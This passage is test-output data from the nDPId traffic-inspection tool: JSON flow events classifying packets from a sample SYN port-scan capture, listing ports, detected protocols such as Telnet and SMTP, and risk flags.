port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060743,"flow_last_seen":1278275060743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":426,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"Telnet","breed":"Unsafe","category":"RemoteAccess"},"telnet": {"username":"","password":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059156,"flow_last_seen":1278275059156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SMTP","breed":"Acceptable","category":"Email"},"smtp": {"user":"","password":""}} -00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275057678,"flow_last_seen":1278275057740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":25,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":327,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":765,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":832,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4125,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057743,"flow_last_seen":1278275057743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057885,"flow_last_seen":1278275057885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1640,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1701,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061003,"flow_last_seen":1278275061003,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":33,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4129,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 